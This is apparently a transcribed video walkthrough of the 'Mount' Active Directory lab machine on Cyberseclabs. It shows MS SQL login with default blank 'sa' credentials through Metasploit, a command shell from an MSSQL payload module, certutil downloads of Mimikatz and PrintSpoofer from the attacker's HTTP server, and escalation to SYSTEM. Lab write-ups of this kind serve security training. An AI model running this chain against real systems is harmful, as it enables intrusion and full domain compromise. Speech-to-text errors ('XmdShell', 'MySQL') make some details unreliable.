Welcome back. Today we're going to go over one of the machines in Cyberseclabs. It is Active Directory machine. The name is Mount. It is easy machine. It is not that difficult. I expected all the machines to be difficult, but so far the most difficult ones I have experienced are the Sync and Toast. For Mount, I don't think so. Maybe you have some other opinion. So let's get started. So basically here I did an nmap scan and I found the regular typical open ports at an Active Directory Windows system. So we have the Kerberos, we have LDAP, other ports, and some of them are TCP wrapped. But the thing that stands out is this one. So we have Microsoft SQL Server, right? And this is something that we don't see frequently in Cyberseclabs. So basically, this got me thinking we may need to start with the MySQL Server, Microsoft SQL Server at port 1433. So how do you connect to that? So basically, to connect to Microsoft SQL Server, we can do that from the command line. We can install the tools and install SQL CMD and BCP, the SQL Server command line tools on Linux. And there are instructions to install on every system, Red Hat, Ubuntu. So let's see for Ubuntu here. On Ubuntu, all you have to do is to follow the following commands. Okay, so I haven't installed, you don't need to install MySQL tools to interact with MySQL Server. Although you can do that in your spare time, you can install according to instructions in Microsoft. But this tutorial is not for installation of MS SQL tools. So we're going to opt for the fastest way, which is using Metasploit. Now I am jumping right directly to Metasploit. Why? Since in Kerberos, we can always try to brute force the users from a word list and see the users who don't have the pre-authentication ticket set, like we did in the last videos, right? So I don't like repeating stuff over and over again. We might find some users, try it. Here also we have something we can do as well, the LDAP. We can try to interact with the LDAP with nmap scripting. So here we can, what we can do, we can use sudo nmap-sv and here -- script. Let's find here, go down. The script name was something like, yes, so see what we can reveal from the Active Directory. And we type the IP 172.31.3.5. And we can try to grab info about hostings down. You can see we can try to grab some info about the LDAP, but we already see that we have the Active Directory DNS name mountdc. We can do some more detailed nmap scan by doing the -a switch, but let's now hop to Metasploit and see how can we interact with the MySQL Server. So msf console. Okay, so here we try to first enumerate the MySQL Server. So we type search type name MS SQL. I'm not sure if I type auxiliary correctly. Okay, so let's try with C exploit. All right, so let's go back to auxiliary, and here we put something like MS SQL. Okay, so here we can try the auxiliary modules to enumerate the MySQL server. We have MySQL password hash dump, login utility ping, schema dump, authentication capture. So what's interesting to me is the login utility. So maybe it might be that the administrators have left the default credentials configured. So we can try with Metasploit, use show options. So we have here blank passwords, brute force, use target port, username. As you can see, the username is SA, which is the default username in MySQL server, Microsoft SQL Server. The default password is blank, right? So let's try running this module. Set our host first. 5, run. So here the nmap script has finished for enumerating the Active Directory info, the LDAP info. We can see here the domain naming, CSL mounts, LDAP service name, other info, go down, schema details, naming conventions. Okay, DNS host name, mount DC at mount.csl. Okay, so here unable to connect. Let's go back. What was the port? 1433. Our host is fine. Login failed, workstation SA unable to connect. No active DP. Okay, that is interesting. All right, so previous so the login has failed. Schema dump, ping utility. Let's use that. Set our hosts 172.31.3.5. Username SA, password blank, and try to run this. Okay. Let's go back to the auxiliary modules. See what we can find here. Hash dump. Let's try the hash dump. Passwords blank. I want to check on my VPN connection. Maybe there's something wrong with that. As I guessed. All right. Now let's run. Instance name Neil. So there is database in there. Okay. Previous run the ping utility. Okay. Now let's try the login module again. Since we have reset the connection, so it might be the connection issue that we prevented us from connecting to properly to MySQL server. So use show options. Okay, so blank passwords, host file, pass file none, port, username. Okay, run. So the login has been successful. As you can see, the default username is SA and the default password is blank. So basically that is the main vector of this machine. The default credentials on MySQL are left as is, which means we can now log in to MySQL, to the Microsoft SQL Server and perform all kinds of dirty stuff. It's all the time with the authentication. It starts always with the authentication, weak passwords or the default configurations. Lethal and awful. Okay. Now, since we have the credentials now, let's now escalate our efforts to exploits. So search, type, exploit, name, MS SQL. Nothing. Okay, let's change the search from exploit to payload. MS SQL, nothing. Like that. Okay. Let me try with only SQL. Overwhelming. Yep. So here, all of these are my MySQL. Let's go up. So here we have something like for Microsoft SQL Overflow. Windows. Oh, so we have one. I don't know why it has not appeared in our search. Exploit Windows MS SQL. Hello, but this is Overflow. And I have this one, which is also Overflow, not interested. Let's go down. Microsoft Server, not interested. Memory corruption, also not interested. Payload, execution. What is that? So Microsoft SQL Server, CLI stored procedure payload execution. This is interesting. Microsoft SQL Server database link crawling command execution. This is also interesting. We have also another one. So we have plenty of options. We can use this one, we can use this one, and we can use this one. So let's try use this one. If we try using this one, let's see what are the options. Show options. So the options are the password is blank, our host is okay. What else is required? Okay. So lhost, we need to change our lhost actually, of course. So set our hosts and no, it was 72, 31, 345. Set lhost. If config .7 and then the port, our port is correct. Run. Exploit failed. One or more options failed to validate the password. The password is empty. Set password. Run. Okay. Successfully connected. System admin mount on DC. XmdShell is not enabled on mount DC. Enable disabling XmdShell. Okay, the exploit has failed, which is understandable. The XmdShell is not enabled on the domain controller, and it has not been successful enabling. So let's go back and see what other exploits we have. So we tried this, didn't work. Let's try this one. Now use paste show options set lhost 10.10.07 set rhost 172.31.3.5, and everything else is set as correct. SA server port, server host port, CMD method CMD. Okay, run. The server may have XmdShell disabled. Okay. Okay, so it has succeeded. So we have one interpreter session. Okay, now the next thing is to do privilege escalations. So get UID, who we are, and we are my MC SQL server. So we are a service account. It is like being a web server account. In Linux, it could be www.data, MySQL. In Windows, it could be IIS, or it could be MC SQL server. So this is service account. Let's drop to shell. Okay, who am I? Dash user MC SQL server, and this is an Active Directory machine. Okay, so now what we can do is understand and enumerate more about the system. Let's try if you use Mimikatz. Let's use Mimikatz. Maybe this will work. So cd back, cd back, cd back. So directory. So let's cd to users. See what we have. Nothing. ls-force. Oh, we need to do that in PowerShell. Can we launch PowerShell? That is better. So ls-force. Okay, so we have administrator, default, user, public, some stuff. A Woods. So let's try cd to administrator. Oh. Well, permission denied. Okay, we can't list files in the administrator. Let's go back. Directory ls-force cd Woods. What's in there? ls-force permission denied. That is expected. Okay, so it is definite we need to do privilege escalation here. Okay, but first let's understand, or let's try to download Mimikatz. Let's go back. And let's see a directory we can cd to. Okay, cd public cd desktop. Okay, that is great. Let's now download Mimikatz from our system. So here, Python 3-m http.server cert util-url cache -f http 10.10.07 mimikatz.exe mimikatz.exe. So search util failed, not found. What's that? Let's check on that. So get mimikatz not found. File not found. Is that correct? Let's go back. Yeah, that's correct. So we move mimikatz here. Easier. Go back. Oh. Okay, so I couldn't run Mimikatz for some reason, maybe because it is a service account or I don't have the permissions to do that. I tried several times. Anyway, so let's check the privileges of our user. Who am I? Priv. Okay, so MS SQL Server can C assign primary, C increase machine impersonate privilege, which is something good, right? Impersonating privileges. So we can invoke the token or incognito module in Metasploit. So let's go background XmdShell. So here load incognito. So here so now let's list the tokens we have. So we have MS SQL Server, SQL Telemetry, and no other tokens are available. So there's nothing of value here. If there was some other user like Net Authority System, local system, some other user, we would have impersonated that user, but we can't now. It's nothing of no value here. SQL Telemetry and MS SQL Server. So incognito has not worked for us. So if we go back to shell and we can here use Juicy Potato, but personally I don't like Juicy Potato. I don't know why. Let's go to Chrome and see how we can escalate from MS SQL Server as a service account into local system or net authority system. So Google MS SQL Server service account privilege escalation. So there is something for us in Hacktrix, basic info, default port, info gathering, Metasploit, MS SQL enum, logins. We tried all of this. NTLM service hash gathering. Oh, there is something. Use auxiliary admin MySQL NTLM stealer. That is interesting, right? Let's use that. We can dump the hashes. So here we go back, exit the shell, and background use show options, set our hosts at 72.31.3.5. Port is correct, username is correct, password is correct, and we run. Go check your SMB relay or captured module for goodies. Okay. Let's go here. I like this. Let's use that. Show options, set our hosts 72.31.3.5. Run. SA has the sysadmin rule, no escalation required. Okay. All right, so nothing over here we can do. Let's go up. So here, service, account, Windows, privilege, escalation. Okay, so if we search for C impersonate privilege escalation, so we have juicy potato, we have print spoofer. Print spoofer, what is that? Over the last few years, tools such as have made an exploitation of impersonation privileges on Windows very popular among the offensive security. Okay, let's go down, understand this. Token, all right, they explain the process here. Okay, so this is how the exploit works. We can use print spoofer to do that. And that's very detailed explanation. Let's see if we can find this on print spoofer, like that. Okay, there is something on GitHub. So here we can escalate from service accounts like network service, MS SQL service, IIS service to system by using this app or this exploit. Okay, so one thing to do here is to download this first. Let's do that in our local machine. So git clone. Okay, ls. Now cd to print. Okay, so we have the app here. Let's see the permissions. That is good. Now we're gonna upload this to the destination remote host. So let's go back and sessions-i, sessions-i1. So now I need to upload the print spoofer. I tried several times. As you can see, I got access denied. So I thought that we might need to move to some other directory since this is a service account and it doesn't have much privileges. So I moved from Windows temp. So here we're going to try cert intel-url cache-f and then 0.7 8000 print spoofer xe print spoofer xe. Let's go back and launch the Python listener. So nothing here. Okay. So now let's go back to the exploit and see here how to get this work. So we put the app -i-c-cmd print spoofer -i-c, right? And then cmd is recognized as, let me list. So the file hasn't been written to the directory, maybe because of permissions. Okay, so let's go back, find some other directory where we have permissions. If we download here, let's take the command again, which was here. So directory print spoofer is yet not here. So it's not being written due to permissions. So we're gonna have to find some directory where we have right permissions. Most probably it is the directory of the server itself. Let's find the MySQL server directory here somewhere else. Server data center, service profiles, servicing. Let's go here. So we have the server directory. Let's take it. Okay. cd. I'm sure there is a hidden directory called updata. Let's try cding to that directory. That is right. Cd local, and then cd to temp. All right, so here I'm sure here we can write files. So let's go back and download the tool again. Okay, let's check it out. So the exploit has been downloaded and written to the directory, which is them. So now we execute print spoofer -i -c cmd. And who am I? And we are the domain controller. So that's how this challenge is solved. Pretty basic challenge, easy challenge. There is no something out of the box we need to do. Basic authentication or default credentials were left at the MySQL server. We use these default credentials to gain, let's say, unprivileged shell, which was under the name of MS SQL Server. Then we used an exploit, which is dedicated, which is like a juicy potato for those users who has the C impersonate privilege enabled. And we use that exploit and it worked. So make sure that you put the exploit in a directory that is written by the user, because the user here is MS SQL Server, which is service account and doesn't have much privileges to write over directories unless it is profile, it is directory. So I hope that was helpful and see you in the next video.